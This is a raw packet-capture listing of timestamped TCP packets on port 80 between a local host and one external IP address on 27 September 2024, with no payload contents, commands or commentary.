Sep 27, 2024 00:15:10.776690006 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.776719093 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.776889086 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.776901007 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.776911974 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.776953936 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.776953936 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.776978970 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.776989937 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.777002096 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.777012110 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.777024031 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.777031898 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.777048111 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.777163982 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.777785063 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.777842999 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.777977943 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.777990103 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.778001070 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.778018951 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.778028011 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.778028011 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.778038979 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.778050900 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.778063059 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.778099060 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.778099060 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.778146029 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.778336048 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.778426886 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.778939962 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.779011965 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.779140949 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.779153109 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.779211044 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.779211044 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.779227972 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.779238939 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.779251099 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.779340982 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.779340982 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.779350996 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.779361010 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.779371023 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.779391050 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.779396057 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.779412031 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.779459953 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.780116081 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.780128002 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.780138016 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.780158043 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.780163050 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.780174971 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.780183077 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.780193090 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.780205011 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.780220032 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.780232906 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.780239105 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.780268908 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.780284882 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.781047106 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.781059980 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.781070948 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.781106949 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.781117916 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.781117916 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.781128883 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.781141996 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.781153917 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.781168938 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.781168938 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.781183004 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.781199932 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.781199932 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.781232119 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.782042027 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.782054901 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.782073975 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.782083988 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.782095909 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.782108068 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.782119989 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.782129049 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.782129049 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.782129049 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.782144070 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.782161951 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.782161951 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.782233953 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.782911062 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.782978058 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.783039093 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.783051014 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.783103943 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.783121109 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.783130884 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.783143044 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.783150911 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.783150911 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.783163071 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.783186913 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.783186913 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.783210039 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.783282042 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.783293009 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.783303022 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.783314943 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.783327103 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.783334017 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.783344030 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.783355951 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.783366919 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.783375978 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.783375978 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.783394098 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.783406973 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.783416986 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.783447981 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.783459902 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.783471107 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.783480883 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.783492088 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.783504009 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.783518076 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.783570051 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.783570051 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.783585072 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.783585072 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.783603907 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.783615112 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.783652067 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.783652067 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.784406900 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.784466028 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.784516096 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.784528017 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.784545898 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.784558058 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.784569979 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.784593105 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.784593105 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.784636021 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.784806013 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.784817934 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.784828901 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.784862041 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.784883022 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.784890890 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.784903049 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.784914017 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.784924984 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.784936905 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.784948111 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.784970999 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.784976959 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.784976959 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.784976959 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.784990072 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.785021067 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.785115957 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.785130978 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.785142899 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.785155058 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.785166025 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.785177946 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.785190105 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.785221100 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.785221100 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.785221100 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.785237074 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.785525084 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.785537004 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.785547972 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.785607100 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.785607100 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.785624027 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.785635948 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.785648108 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.785689116 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.785689116 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.786812067 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.786824942 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.786835909 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.786847115 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.786859035 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.786871910 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.786878109 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.786889076 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.786901951 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.786912918 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.786922932 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.786922932 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.786923885 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.786940098 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.786951065 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.786959887 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.786969900 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.786989927 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.787019968 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.787059069 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.787070036 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.787081003 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.787092924 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.787105083 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.787112951 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.787152052 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.787152052 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.787167072 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.787178040 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.787189960 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.787226915 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.787226915 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.787250996 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.787262917 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.787273884 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.787286043 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.787307978 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.787307978 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.787342072 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.787417889 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.787430048 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.787441015 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.787451982 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.787461996 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.787471056 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.787482977 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.787492990 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.787503958 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.787513018 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.787513018 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.787525892 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.787571907 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.787571907 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.787585020 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.787595987 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.787611008 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.787620068 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.787653923 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.289055109 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.293906927 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.474342108 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.474359989 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.474373102 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.474458933 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.474469900 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.474481106 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.474497080 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.474512100 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.474526882 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.474538088 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.474550009 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.474575043 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.474575043 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.474575043 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.474575043 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.474575043 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.474636078 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.475339890 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475353003 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475363970 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475373983 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475398064 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475408077 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475413084 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.475413084 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.475425005 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475435019 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475445986 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475456953 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475466967 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475477934 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475490093 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475500107 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475512981 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475522995 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475533009 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475536108 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.475536108 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.475543976 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475547075 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.475547075 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.475547075 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.475554943 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475569010 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475583076 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475589037 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.475589037 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.475594044 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475605011 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475615978 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475626945 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475636959 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475650072 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475661993 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475672960 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475682974 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475698948 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475711107 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475723028 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475734949 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475745916 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475750923 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.475750923 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.475750923 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.475750923 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.475750923 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.475750923 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.475750923 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.475756884 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475768089 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475771904 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.475778103 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475789070 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475799084 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.475800991 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475811958 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475822926 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475832939 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475843906 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475856066 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.475922108 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.475922108 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.475922108 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.475922108 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.475922108 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.476018906 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476030111 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476042032 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476052999 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476063013 CEST	80	49709	147.45.44.104	192.168.2.5
